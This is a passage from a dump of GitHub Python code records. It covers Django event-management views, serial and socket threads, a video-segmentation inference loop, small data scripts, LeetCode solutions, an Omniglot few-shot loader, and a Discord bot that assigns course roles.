indent=4)\n","repo_name":"xufuhai/mitmproxy","sub_path":"examples/contrib/import_har/test_readhar.py","file_name":"test_readhar.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"19876953734","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required, user_passes_test\n\nfrom notifications.models import *\nfrom threading import Timer\n\nfrom authentication.forms import organizerForm\nfrom functools import wraps\nfrom django.contrib import messages\nfrom authentication.models import User, Organizer\nfrom .forms import *\nfrom .models import *\nimport os \nfrom django.shortcuts import (\n    HttpResponseRedirect,\n    get_object_or_404,\n    get_list_or_404,\n    redirect,\n    render,\n)\nfrom django.conf import settings\n\n@login_required\ndef createEventView(request):\n    categories = Categories.objects.all()\n\n    if request.method == \"POST\":\n        form = createEventForm(request.POST)\n        \n\n        if form.is_valid():\n            user = User.objects.get(username=request.user.username)\n            event = form.save(commit=False)\n            event.organizer = user\n            event.save()\n            # event = Events.objects.create(\n            #     organizer = user,\n            #     eventName = request.POST[\"eventName\"],\n            #     eventDescription = request.POST[\"eventDescription\"],\n            #     payment = request.POST[\"payment\"],\n            #     eventCategories = request.POST[\"eventCategories\"],\n            #     eventStartDate = request.POST[\"eventStartDate\"],\n            #     eventEndDate = request.POST[\"eventEndDate\"],\n            #     eventStartTime = request.POST[\"eventStartTime\"],\n            #     eventEndTime = request.POST[\"eventEndTime\"],\n            #     eventType = request.POST[\"eventType\"],\n            #     venue = request.POST[\"venue\"],\n            #     eventCity = request.POST[\"eventCity\"],\n\n            # )\n            if event:\n                messages.success(request, f\"Event created successfully.\",extra_tags=\"success\")\n                return redirect('events-list')\n            else:\n                messages.error(request, f\"Internal error occurred! 
Try again in a few.\",extra_tags=\"danger\")\n\n        else:\n            context={\n                \"form\":form,\n                \"categories\": categories,\n            }\n            return render(request, 'events/create_event.html',context)\n    else:\n        form = createEventForm()\n        context = {\n            \"categories\": categories,\n            \"form\":form,\n        }\n        return render(request, 'events/create_event.html',context)\n\n\n\n@login_required\ndef eventsListView(request):\n\n    try:\n        events = Events.objects.filter(organizer=request.user.id).order_by('-date_added')\n        context ={\n            'events':events,\n        }\n\n    except Exception as e:\n        messages.error(request, f\"Error occurred while fetching data from the database\", extra_tags='danger')\n        return redirect('organizer-home')\n\n    return render(request, 'events/events_list.html',context)\n\n\n\n\n@login_required\ndef eventPublish(request,id):\n    obj = get_object_or_404(Events, id=id)\n    obj.is_published = True\n    user = obj.organizer\n    if user.totalEvents:\n        user.totalEvents += 1\n    else:\n        user.totalEvents = 1\n    user.save()\n    obj.save()\n    messages.success(request, f'Event has been published!', extra_tags=\"success\")\n    return eventPreview(request,id)\n\n\n\n@login_required\ndef cancelEvent(request,id):\n    obj = get_object_or_404(Events, id=id)\n    if obj.soldTickets > 0:\n        messages.error(request, \"You cannot cancel an event with sold tickets!\",extra_tags=\"danger\")\n        return eventPreview(request,id)\n    else:\n        obj.delete()\n        messages.success(request, f'Event has been deleted!', extra_tags=\"success\")\n        return redirect('events-list')\n\n\n\n\n\n\n@login_required\n# @organizerIsSetup\ndef eventsDetailView(request, id):\n    obj = get_object_or_404(Events, id=id)\n    dire = Events.objects.filter(organizer=request.user.id)\n    org = get_object_or_404(Organizer, organizer=request.user.id)\n    img = Images.objects.filter(event=obj.id)\n    if request.POST and request.POST.get(\"add-image\", None):\n        url = request.get_full_path()\n        newUrl = url.split('/')\n        urlID = int(newUrl[len(newUrl)-1])\n        addEventImages(request,urlID)\n        return redirect('event-details', id)\n    if request.POST and request.POST.get(\"updateImage\", None):\n        url = request.get_full_path()\n        newUrl = url.split('/')\n        urlID = int(newUrl[len(newUrl)-1])\n        updateEventImage(request,urlID)\n        return redirect('event-details', id)\n    if request.POST and request.POST.get(\"deleteImage\", None):\n        url = request.get_full_path()\n        newUrl = url.split('/')\n        urlID = int(newUrl[len(newUrl)-1])\n        deleteEventImage(request,urlID)\n        return redirect('event-details', id)\n    if img:\n        first = img[0].image\n    else:\n        first =None\n    if obj in dire:\n        form = updateEventForm(request.POST or None,request.FILES or None, instance=obj)\n        # form2 = ImagesForm(request.POST or None, instance=img)\n        if request.method==\"POST\":\n\n            if form.is_valid():\n                event = form.save(commit=False)\n                user = User.objects.get(username=request.user.username)\n                event.organizer=user\n                event.save()\n                messages.success(request, f'The Event has been updated!',extra_tags=\"success\")\n                url = request.get_full_path()\n                # this = url.replace('update', '')\n                return redirect('event-details',obj.id)\n        urlB4 = request.get_full_path()\n        urlB4 = urlB4.split('/')\n        url = urlB4[len(urlB4)-1]\n        context = {\n            'form': form,\n            'img':img,\n            'first':first,\n            'url':url,\n        }\n        return render(request, \"events/events_detail.html\", context)\n    else:\n        messages.warning(\n            request, f'You have no authorization to access or edit other events!',extra_tags=\"warning\")\n        return redirect('events-list')\n\n\n\n\n
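# Helper used by eventsDetailView: validates each uploaded file (size limit 15728640 bytes = 15 MB,\n# extension whitelist settings.IMAGE_EXT) before attaching it to the event as an Images row.\n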
def addEventImages(request,newUrl):\n    try: \n        images = request.FILES.getlist('eventImages')\n        event = Events.objects.get(id=newUrl)\n        for image in images:\n            if image.size > 15728640 :\n                messages.error(request,\"Maximum allowed size for image is 15MB.\",extra_tags=\"danger\")\n                return redirect('event-details' ,newUrl)\n\n            \n            reversedName = image.name [::-1]\n            extension = reversedName.split('.')[0]\n            ext = extension[::-1]\n\n            if not ext in settings.IMAGE_EXT:\n                messages.error(request,\"File type not supported! Please upload only: .jpg, .jpeg, .png format files.\",extra_tags=\"danger\")\n                return redirect('event-details' ,newUrl) \n            Images.objects.create(\n                event = event,\n                image = image\n            )\n        messages.success(request, \"Images added successfully!\", extra_tags=\"success\")\n    except Exception as e:\n        messages.error(request, \"Error occurred during your upload. Make sure the file format is PNG, JPEG, or JPG\",extra_tags=\"danger\")\n    return redirect('event-details' ,newUrl)\n\n\n\n\n\n\n\ndef updateEventImage(request,newUrl):\n    try: \n        image = request.FILES['updatedEventImage']\n        id = request.POST['id']\n        before = Images.objects.get(id=id)\n\n\n        if image.size > 15728640 :\n            messages.error(request,\"Maximum allowed size for image is 15MB.\",extra_tags=\"danger\")\n            return redirect('event-details' ,newUrl)\n\n        reversedName = image.name [::-1]\n        extension = reversedName.split('.')[0]\n        ext = extension[::-1]\n\n        if not ext in settings.IMAGE_EXT:\n            messages.error(request,\"File type not supported! Please upload only: .jpg, .jpeg, .png format files.\",extra_tags=\"danger\")\n            return redirect('event-details' ,newUrl)\n\n        os.remove(before.image.path)\n        before.image = request.FILES['updatedEventImage']\n        before.save()\n        messages.success(request, \"Images updated successfully!\", extra_tags=\"success\")\n    except Exception as e:\n        messages.error(request, \"Error occurred during your upload. Make sure the file format is PNG, JPEG, or JPG\",extra_tags=\"danger\")\n    return redirect('event-details' ,newUrl)\n\n\n\n\n\ndef deleteEventImage(request, newUrl):\n    id = request.POST['id']\n    obj = get_object_or_404(Images, id = id)\n    if obj:\n        obj.delete()\n        messages.success(request, f'Image has been deleted!', extra_tags=\"success\")\n        return redirect('event-details' ,newUrl)\n    else:\n        return redirect('event-details' ,newUrl)\n\n\n\n\n\n\n\n\n\ndef eventPreview(request, id):\n    obj = get_object_or_404(Events, id=id)\n    dire = Events.objects.filter(organizer=request.user.id)\n    if obj in dire:\n        try:\n            images = Images.objects.filter(event=obj.id)\n            first = images[0].image\n            context={\n                \"event\" : obj,\n                \"images\" : images,\n                \"first\": first,\n            }\n        except:\n
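            # images[0] raises IndexError when no Images rows exist for the event yet\n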
            messages.error(request, f\"Your event needs at least one image! You can add multiple\", extra_tags=\"danger\")\n            return redirect('event-details', id)\n\n\n    return render(request, \"events/events_preview.html\", context)","repo_name":"natibogale/eventTray_api","sub_path":"events/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"425461438","text":"# -*- coding: utf-8 -*-\r\n#!/usr/bin/python\r\nimport sys\r\nimport glob\r\nimport serial\r\nimport threading\r\nimport queue\r\nimport socket\r\nfrom enum import Enum\r\nimport io\r\n\r\nclass ConnectionType(Enum):\r\n    RS232 = 0\r\n    SOCKET = 1\r\n\r\nclass SerialThread(threading.Thread):\r\n    \"\"\"Thread that owns a serial connection and forwards received lines to a queue.\"\"\"\r\n    def __init__(self, queue, ser=None):\r\n        threading.Thread.__init__(self)\r\n        self.ser = ser\r\n        self.queue = queue\r\n        self._stopevent = threading.Event()\r\n        print(\"Thread\")\r\n\r\n    @staticmethod\r\n    def find_serial():\r\n        \"\"\"\r\n        Find all available COM ports connected to the current system\r\n        \"\"\"\r\n        if sys.platform.startswith('win'):\r\n            ports = ['COM%s' % (i + 1) for i in range(50)]\r\n        elif sys.platform.startswith('linux') \\\r\n                or sys.platform.startswith('cygwin'):\r\n            # this excludes your current terminal \"/dev/tty\"\r\n            ports = glob.glob('/dev/tty[A-Za-z]*')\r\n        elif sys.platform.startswith('darwin'):\r\n            ports = glob.glob('/dev/tty.*')\r\n        else:\r\n            raise EnvironmentError('Unsupported platform')\r\n\r\n        result = []\r\n        for port in ports:\r\n            try: # exception if not available\r\n                s = serial.Serial(port)\r\n                s.close()\r\n                result.append(port)\r\n            except (OSError, serial.SerialException):\r\n                pass\r\n        return result\r\n\r\n    def connect(self, ser):\r\n        try:\r\n            print(\"Connecting \" + str(ser['port']))\r\n            self.conn = serial.Serial(ser['port'], ser['baudrate'],\r\n                    bytesize=8, parity='N', stopbits=1,timeout=0.1)\r\n            print(self.conn)\r\n            self.sio = io.TextIOWrapper(io.BufferedRWPair(self.conn, self.conn, 1),\r\n                    newline = '\\r')\r\n            self.sio._CHUNK_SIZE = 1\r\n            return False\r\n        except Exception as e:\r\n            raise e from None\r\n\r\n    def write(self, data):\r\n        self.data = data +\"\\r\"\r\n\r\n    def read(self):\r\n        res = self.conn.readline()\r\n        self.conn.flush()\r\n        return res\r\n\r\n    def run(self):\r\n        while True:\r\n            try:\r\n                if self.conn.inWaiting():\r\n                    text = self.sio.readlines()\r\n                    print(text)\r\n                    for line in text:\r\n                        if line and line.find('\\x03') == -1:\r\n                            self.queue.put(line.strip())\r\n\r\n                if self.data:\r\n                    self.conn.write(self.data.encode())\r\n                    self.data=None\r\n                    #self.sio.flush()\r\n            except:\r\n                pass\r\n\r\nclass SocketThread(threading.Thread):\r\n    def __init__(self, queue, sock=None):\r\n        threading.Thread.__init__(self)\r\n        self.data=None\r\n        self.queue = queue\r\n        self.conn = sock\r\n\r\n    def connect(self, dev_socket):\r\n        s = None\r\n        print(\"Connecting to socket '{}'\".format(dev_socket))\r\n        for res in socket.getaddrinfo(dev_socket['ip'], dev_socket['port'],\r\n                socket.AF_UNSPEC, socket.SOCK_STREAM):\r\n            af, socktype, proto, canonname, sa = res\r\n            try:\r\n                s = socket.socket(af, socktype, proto)\r\n            except OSError as msg:\r\n                s = None\r\n                continue\r\n            try:\r\n                s.settimeout(1)\r\n                s.connect(sa)\r\n            except OSError as msg:\r\n                s.close()\r\n                s = None\r\n                continue\r\n            self.conn = s\r\n            break\r\n        print(self.conn)\r\n        return s\r\n\r\n    def write(self, data):\r\n        try:\r\n            self.data = data\r\n        except Exception as e:\r\n            raise e\r\n\r\n    def read(self, bytes=1024):\r\n        if self.conn:\r\n            data = 
self.conn.recvfrom(bytes)\r\n return data[0]\r\n else:\r\n return None\r\n\r\n def run(self):\r\n while True:\r\n try:\r\n if self.data:\r\n print(self.data)\r\n self.conn.send(self.data.encode())\r\n data_in = self.read()\r\n if data_in:\r\n self.queue.put(data_in.decode())\r\n except socket.timeout:\r\n pass\r\n except ValueError:\r\n self.queue.put(\"Out of range\")\r\n except:\r\n pass\r\n","repo_name":"Holks/serDev","sub_path":"modules/threads.py","file_name":"threads.py","file_ext":"py","file_size_in_byte":4428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"73295282603","text":"# -*- coding: utf-8 -*-\n# @Author: Haozhe Xie\n# @Date: 2020-04-09 11:30:26\n# @Last Modified by: Haozhe Xie\n# @Last Modified time: 2020-11-05 15:03:15\n# @Email: cshzxie@gmail.com\n\nimport logging\nimport os\nimport torch\n\nimport utils.data_loaders\nimport utils.helpers\n\nfrom tqdm import tqdm\n\nfrom models.rmnet import RMNet\nfrom models.tiny_flownet import TinyFlowNet\n\n\ndef inference_net(cfg):\n # Set up data loader\n test_data_loader = torch.utils.data.DataLoader(\n dataset=utils.data_loaders.DatasetCollector.get_dataset(\n cfg, cfg.DATASET.TEST_DATASET, utils.data_loaders.DatasetSubset.TEST),\n batch_size=1,\n num_workers=cfg.CONST.N_WORKERS,\n pin_memory=True,\n shuffle=False)\n\n # Setup networks and initialize networks\n tflownet = TinyFlowNet(cfg)\n rmnet = RMNet(cfg)\n\n if torch.cuda.is_available():\n tflownet = torch.nn.DataParallel(tflownet).cuda()\n rmnet = torch.nn.DataParallel(rmnet).cuda()\n\n # Load the pretrained model from a checkpoint\n logging.info('Recovering from %s ...' % (cfg.CONST.WEIGHTS))\n checkpoint = torch.load(cfg.CONST.WEIGHTS)\n tflownet.load_state_dict(checkpoint['tflownet'])\n rmnet.load_state_dict(checkpoint['rmnet'])\n\n # Switch models to evaluation mode\n tflownet.eval()\n rmnet.eval()\n\n # The inference loop\n for idx, (video_name, n_objects, frames, masks, optical_flows) in enumerate(test_data_loader):\n with torch.no_grad():\n _, est_probs = utils.helpers.multi_scale_inference(cfg, tflownet, rmnet, frames, masks,\n n_objects)\n\n video_name = video_name[0]\n output_folder = os.path.join(cfg.DIR.OUTPUT_DIR, 'benchmark', cfg.CONST.EXP_NAME,\n video_name)\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n\n frames = frames[0]\n est_masks = torch.argmax(est_probs[0], dim=1)\n n_frames = est_masks.size(0)\n for i in tqdm(range(n_frames), leave=False, desc=video_name):\n frame = frames[i]\n est_mask = est_masks[i]\n segmentation = utils.helpers.get_segmentation(frame, est_mask, {\n 'mean': cfg.CONST.DATASET_MEAN,\n 'std': cfg.CONST.DATASET_STD,\n })\n segmentation.save(os.path.join(output_folder, '%05d.png' % i))\n","repo_name":"hzxie/RMNet","sub_path":"core/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"en","doc_type":"code","stars":83,"dataset":"github-code","pt":"19"} +{"seq_id":"49995613983","text":"import pandas as pd\nfrom finnish_business_portal.utils.myfiles import add_home\n\ndf = pd.read_csv(\"~/git/Omat/HankenKandi/finnish_business_portal/data/firmor201401to04.csv\")\nprint(df.info)\nprint(df.describe)\n\n#df = df[df['liquidations'].astype(bool)]\n#print(df.head())\ndf['lig'] = df.apply(lambda x: len(x.liquidations), axis=1)\ndfliq = df[(df.lig > 
2)]\ndfliq.to_csv('liqs.csv')\n\n\n","repo_name":"paapu88/finnish_business_portal","sub_path":"finnish_business_portal/tasks/anayse_prh_csv.py","file_name":"anayse_prh_csv.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"11349895839","text":"#!/usr/bin/env python3\n\"\"\"\nCREATED AT: 2022-09-14\n\nURL: https://leetcode.com/problems/mean-of-array-after-removing-some-elements/\n\nGITHUB: https://github.com/Jiezhi/myleetcode\n\nFileName: 1619-MeanOfArrayAfterRemovingSomeElements\n\nDifficulty: Easy\n\nDesc: \n\nTag: \n\nSee: \n\n\"\"\"\nfrom tool import *\n\n\nclass Solution:\n    def trimMean(self, arr: List[int]) -> float:\n        \"\"\"\n        Runtime: 56 ms, faster than 98.16%\n        Memory Usage: 13.9 MB, less than 76.63%\n\n        20 <= arr.length <= 1000\n        arr.length is a multiple of 20.\n        0 <= arr[i] <= 10^5\n        \"\"\"\n        arr.sort()\n        n = len(arr)\n        per5 = int(n * 0.05)\n        return sum(arr[per5:-per5]) / (n - 2 * per5)\n\n\ndef test():\n    assert Solution().trimMean(arr=[1, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 3]) == 2.000\n    assert Solution().trimMean(arr=[6, 2, 7, 5, 1, 2, 0, 3, 10, 2, 5, 0, 5, 5, 0, 8, 7, 6, 8, 0]) == 4.000\n\n\nif __name__ == '__main__':\n    test()\n","repo_name":"Jiezhi/myleetcode","sub_path":"src/1619-MeanOfArrayAfterRemovingSomeElements.py","file_name":"1619-MeanOfArrayAfterRemovingSomeElements.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41048090326","text":"import torchvision\nimport torch\nfrom torch import nn, optim\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom torchvision.datasets import Omniglot\nfrom torchvision.models import resnet18\nfrom tqdm import tqdm\n\nimage_size = 224\ntest_set = torchvision.datasets.Omniglot(\n    root=\"./data\",\n    background=False,\n    transform=transforms.Compose(\n        [\n            # Omniglot images have 1 channel, but our model will expect 3-channel images\n            transforms.Grayscale(num_output_channels=3),\n            transforms.Resize(image_size),\n            transforms.CenterCrop(image_size),\n            transforms.RandomHorizontalFlip(),\n            transforms.ToTensor(),\n        ]\n    ),\n    download=True,\n)\n\nfrom easyfsl.samplers import TaskSampler\nfrom easyfsl.utils import plot_images, sliding_average\n\nN_WAY = 5  # Number of classes in a task\nN_SHOT = 5  # Number of images per class in the support set\nN_QUERY = 10  # Number of images per class in the query set\nN_EVALUATION_TASKS = 100\n\n# The sampler needs a dataset with a \"get_labels\" method. Check the code if you have any doubt!\ntest_set.get_labels = lambda: [\n    instance[1] for instance in test_set._flat_character_images\n]\ntest_sampler = TaskSampler(\n    test_set, n_way=N_WAY, n_shot=N_SHOT, n_query=N_QUERY, n_tasks=N_EVALUATION_TASKS\n)\n\ntest_loader = DataLoader(\n    test_set,\n    batch_sampler=test_sampler,\n    num_workers=12,\n    pin_memory=True,\n    collate_fn=test_sampler.episodic_collate_fn,\n)","repo_name":"RianLeevinson/MaritimeFewShotLearning","sub_path":"few_shot_learning/training/omniglot.py","file_name":"omniglot.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4030327829","text":"# If you can imagine it, you can program it \n\n'''\n    Rock, paper, scissors project: a user will play against the computer in this classic game. \n'''\nimport random\n\n
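# Choice encoding used below: 'a' = rock (piedra), 'b' = paper (papel), 'c' = scissors (tijera).\n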
\ndef jugar():\n\n    print('===PLAY===')\n    print(\"a. Rock\")\n    print(\"b. Paper\")\n    print(\"c. Scissors\")\n    \n    lista = ['a','b','c']\n\n    usuario = input(\"Choose an option: \").lower()\n\n    computadora = random.choice(lista)\n\n    if usuario == computadora:\n        \n        exit_1 = print(f\"User: {usuario} || {computadora} :Computer. TIE!\")\n        \n        return exit_1\n    \n    if ganoJugador(usuario,computadora):\n        \n        exit_2 = print(f\"User: {usuario} || {computadora} :Computer. YOU WIN!\")\n\n        return exit_2\n\n    exit_3 = print(f\"User: {usuario} || {computadora} :Computer. YOU LOSE!\") \n\n    return exit_3\n\ndef ganoJugador(jugador, oponente):\n    \n    # return True if the player won\n    # rock (a) beats scissors (c)\n    # scissors (c) beats paper (b)\n    # paper (b) beats rock (a)\n\n    if((jugador == 'a' and oponente == 'c') or (jugador == 'c' and oponente == 'b') or (jugador == 'b' and oponente == 'a')):\n        return True\n    else: \n        return False\n\nprint(jugar())","repo_name":"Cristhian-Andres/Proyectos-FreeCodeCam-en-Python","sub_path":"4 proyecto: piedra-papel-tijera/piedraPapelTijera.py","file_name":"piedraPapelTijera.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40850528582","text":"\"\"\"\nUsage:\n# Create train data:\npython xml_to_csv.py -i [PATH_TO_IMAGES_FOLDER]/train -o [PATH_TO_ANNOTATIONS_FOLDER]/train_labels.csv\n\n# Create test data:\npython xml_to_csv.py -i [PATH_TO_IMAGES_FOLDER]/test -o [PATH_TO_ANNOTATIONS_FOLDER]/test_labels.csv\n\"\"\"\n\nimport os\nimport glob\nimport pandas as pd\nimport argparse\nimport xml.etree.ElementTree as ET\nimport json\n\n\nclass_set = set([\n    'penny-indian',\n    'penny-wheat',\n    'penny-lincoln',\n    'penny-shield',\n    'nickel-shield',\n    'nickel-liberty',\n    'nickel-buffalo',\n    'nickel-jefferson',\n    'dime-liberty-seated',\n    'dime-barber',\n    'dime-mercury',\n    'dime-roosevelt',\n    'quarter-washington',\n    'quarter-bicentennial'\n])\n\npcgs_category_map = { \n    'Indian Cent' : 'penny-indian',\n    'Lincoln Cent (Wheat Reverse)' : 'penny-wheat',\n    'Lincoln Cent (Modern)' : 'penny-lincoln',\n    'Shield Nickel' : 'nickel-shield',\n    'Liberty Nickel' : 'nickel-liberty',\n    'Buffalo Nickel' : 'nickel-buffalo',\n    'Jefferson Nickel' : 'nickel-jefferson',\n    'Liberty Seated Dime' : 'dime-liberty-seated',\n    'Barber Dime' : 'dime-barber',\n    'Mercury Dime' : 'dime-mercury',\n    'Roosevelt Dime' : 'dime-roosevelt',\n    'Washington Quarter' : 'quarter-washington',\n} \n \npcgs_number_map = {}\n \ndef label_text_to_class(row_label): \n    if row_label in class_set:\n        return row_label\n    elif row_label.split('-')[0][4:] in pcgs_number_map:\n        pcgs_record = pcgs_number_map[row_label.split('-')[0][4:]]\n        if pcgs_record['category'] == 'Lincoln Cent (Modern)' and 'Shield Reverse' in pcgs_record['sub_category']:\n            return 'penny-shield'\n        elif pcgs_record['category'] == 'Washington Quarter' and 'Bi-Centennial Reverse' in pcgs_record['sub_category']:\n            return 'quarter-bicentennial'\n        else:\n            return pcgs_category_map[pcgs_record['category']]\n    print ('No label text for ' + row_label.split('-')[0][4:])\n    return None\n\n\ndef xml_to_csv(path):\n    \"\"\"Iterates through all .xml files (generated by labelImg) in a given directory and combines them in a single Pandas dataframe.\n\n    Parameters:\n    ----------\n    path : {str}\n        The path containing the .xml files\n    Returns\n    -------\n    Pandas DataFrame\n        The produced dataframe\n    \"\"\"\n    classes_names = []\n    xml_list = []\n    \n    for 
xml_file in glob.glob(path + \"/*.xml\"):\n tree = ET.parse(xml_file)\n root = tree.getroot()\n for member in root.findall(\"object\"):\n label_class = label_text_to_class(member[0].text)\n classes_names.append(label_class)\n value = (\n root.find(\"filename\").text,\n int(root.find(\"size\")[0].text),\n int(root.find(\"size\")[1].text),\n label_class,\n int(member[4][0].text),\n int(member[4][1].text),\n int(member[4][2].text),\n int(member[4][3].text),\n )\n xml_list.append(value)\n column_name = [\n \"filename\",\n \"width\",\n \"height\",\n \"class\",\n \"xmin\",\n \"ymin\",\n \"xmax\",\n \"ymax\",\n ]\n xml_df = pd.DataFrame(xml_list, columns=column_name)\n classes_names = list(set(classes_names))\n classes_names.sort()\n return xml_df, classes_names\n\n\ndef main():\n global pcgs_number_map\n # Initiate argument parser\n parser = argparse.ArgumentParser(\n description=\"Sample TensorFlow XML-to-CSV converter\"\n )\n parser.add_argument(\n \"-i\",\n \"--inputDir\",\n help=\"Path to the folder where the input .xml files are stored\",\n type=str,\n )\n parser.add_argument(\n \"-o\", \"--outputFile\", help=\"Name of output .csv file (including path)\", type=str\n )\n\n parser.add_argument(\n \"-l\",\n \"--labelMapDir\",\n help=\"Directory path to save label_map.pbtxt file is specified.\",\n type=str,\n default=\"\",\n )\n\n args = parser.parse_args()\n\n if args.inputDir is None:\n args.inputDir = os.getcwd()\n if args.outputFile is None:\n args.outputFile = args.inputDir + \"/labels.csv\"\n\n assert os.path.isdir(args.inputDir)\n \n print (args.inputDir + '/pcgs_number_map.json') \n with open(args.inputDir + '/pcgs_number_map.json') as f:\n pcgs_number_map = json.load(f) \n \n os.makedirs(os.path.dirname(args.outputFile), exist_ok=True)\n xml_df, classes_names = xml_to_csv(args.inputDir)\n xml_df.to_csv(args.outputFile, index=None)\n print(\"Successfully converted xml to csv.\")\n if args.labelMapDir:\n os.makedirs(args.labelMapDir, exist_ok=True)\n label_map_path = os.path.join(args.labelMapDir, \"label_map.pbtxt\")\n print(\"Generate `{}`\".format(label_map_path))\n\n # Create the `label_map.pbtxt` file\n pbtxt_content = \"\"\n for i, class_name in enumerate(classes_names):\n pbtxt_content = (\n pbtxt_content\n + \"item {{\\n id: {0}\\n name: '{1}'\\n}}\\n\\n\".format(\n i + 1, class_name\n )\n )\n pbtxt_content = pbtxt_content.strip()\n with open(label_map_path, \"w\") as f:\n f.write(pbtxt_content)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mbolaris/coin_detection","sub_path":"xml_to_csv.py","file_name":"xml_to_csv.py","file_ext":"py","file_size_in_byte":5288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32211545241","text":"from utils.tree import TreeNode, BuildBinTree\n\n\nclass Solution:\n def isSymmetric(self, root: TreeNode) -> bool:\n lt = []\n rt = []\n\n def LRR(node: TreeNode):\n if not node:\n return\n if not node.left and node.right:\n lt.append(None)\n else:\n LRR(node.left)\n lt.append(node.val)\n if not node.right and node.left:\n lt.append(None)\n else:\n LRR(node.right)\n\n def RRL(node: TreeNode):\n if not node:\n return\n print(node.val)\n if not node.right and node.left:\n rt.append(None)\n else:\n RRL(node.right)\n rt.append(node.val)\n if not node.left and node.right:\n rt.append(None)\n else:\n RRL(node.left)\n\n LRR(root.left)\n RRL(root.right)\n print(lt, rt)\n return lt == rt\n\n\nif __name__ == '__main__':\n vals = [5, 4, 1, None, 1, None, 4, 2, None, 2, None]\n root = 
BuildBinTree(vals)\n sol = Solution()\n print(sol.isSymmetric(root))\n","repo_name":"kumin/AlgorithmsDataStructures","sub_path":"src/main/python/SymmetricTree.py","file_name":"SymmetricTree.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38331970517","text":"\"\"\"\nITEEBot is a role management bot used in the University of Oulu ITEE\neducation Discord server to allow users to sign up for course areas.\nIt holds an internal database of registered courses, each with an assigned\nrole ID, and a signup message ID. When user reacts to the signup message, the\nbot will assign the associated role for that user. When they remove reaction,\nthe bot will remove the associated role.\n\"\"\"\n\nimport logging\nimport os\nimport sys\nfrom logging.handlers import TimedRotatingFileHandler\n\nimport discord\nfrom sqlalchemy.orm import Session\n\nfrom . import database as db\n\nclass ITEEBot(discord.Client):\n \"\"\"\n This class extends discord.py Client. Primary addition is the ability to\n hold two internal objects: a configuration dictionary, and SQLAlchemy\n engine object for database access. These are held in internal attributes\n _cfg and _engine, respectively.\n \"\"\"\n \n def __init__(self, config, *args, debug=False, **kwargs):\n \"\"\"\n Initializes the bot using options from a configuration file. Also\n initializes logging based on the debug argument, using stdout if it is\n True, or a time rotating logger otherwise.\n \n Intents are currently hard-coded based on what are needed for the bot's\n current features.\n \n * config (dict) - configuration dictionary from the configurator module\n * debug (bool) - run in debug mode\n \"\"\"\n \n self._cfg = config\n intents = discord.Intents(\n members=True,\n messages=True,\n reactions=True,\n guilds=True\n )\n self._engine = db.get_engine(config[\"DB\"])\n if debug: \n logging.basicConfig(level=logging.DEBUG)\n else:\n os.makedirs(os.path.dirname(config[\"LOG\"][\"FILE\"]), exist_ok=True)\n rotator = TimedRotatingFileHandler(\n config[\"LOG\"][\"FILE\"],\n when=config[\"LOG\"][\"ROTATE\"][0],\n interval=config[\"LOG\"][\"ROTATE\"][1],\n )\n logging.basicConfig(\n format=\"%(asctime)s %(name)s %(levelname)-8s %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n handlers=[rotator],\n level=logging.INFO\n )\n super().__init__(*args, intents=intents, **kwargs)\n \n def run(self, *args, **kwargs):\n \"\"\"\n Runs the bot, with access token digged up from the configuration.\n \"\"\"\n \n super().run(self._cfg[\"TOKEN\"], *args, **kwargs)\n \n async def on_raw_reaction_add(self, event):\n \"\"\"\n Uses the reaction event's message ID to find the course associated\n with the reacted message. If the course is found, the associated role\n is assigned to the user who triggered the reaction event.\n \n Reactions on channels other than the designated singup channel are \n ignored.\n \n * event (RawReactionEvent) - reaction event from discord.py\n \"\"\"\n \n if event.channel_id != self._cfg[\"SIGNUP_CHANNEL\"]:\n return\n\n with Session(self._engine) as s:\n course = s.query(db.Course).filter_by(\n message_id=event.message_id\n ).first()\n if not course:\n return\n \n guild = self.get_guild(event.guild_id)\n role = guild.get_role(course.role_id)\n await event.member.add_roles(role)\n\n async def on_raw_reaction_remove(self, event):\n \"\"\"\n Uses the reaction event's message ID to find the course associated\n with the reacted message. 
If the course is found, the associated role\n is removed from the user who triggered the reaction event.\n\n Reactions on channels other than the designated singup channel are \n ignored.\n\n * event (RawReactionEvent) - reaction event from discord.py\n \"\"\"\n\n if event.channel_id != self._cfg[\"SIGNUP_CHANNEL\"]:\n return\n\n with Session(self._engine) as s:\n course = s.query(db.Course).filter_by(\n message_id=event.message_id\n ).first()\n if not course:\n return\n \n guild = self.get_guild(event.guild_id)\n role = guild.get_role(course.role_id)\n member = guild.get_member(event.user_id)\n await member.remove_roles(role)\n\n async def on_error(self, event, *args, **kwargs):\n \"\"\"\n Logs errors. \n \n * event (str) - name of the event that caused the error\n \"\"\"\n \n etype, evalue, etrace = sys.exc_info()\n logging.error(f\"Error processing event {event} with arguments\")\n logging.error(\",\".join(repr(arg) for arg in args))\n logging.error(\",\".join(f\"{key!r}: {val!r}\" for key, val in kwargs))\n logging.error(f\"{etype} - {evalue}\")\n\n async def on_ready(self):\n \"\"\"\n Simply logs the ready status for debug purposes.\n \"\"\"\n \n 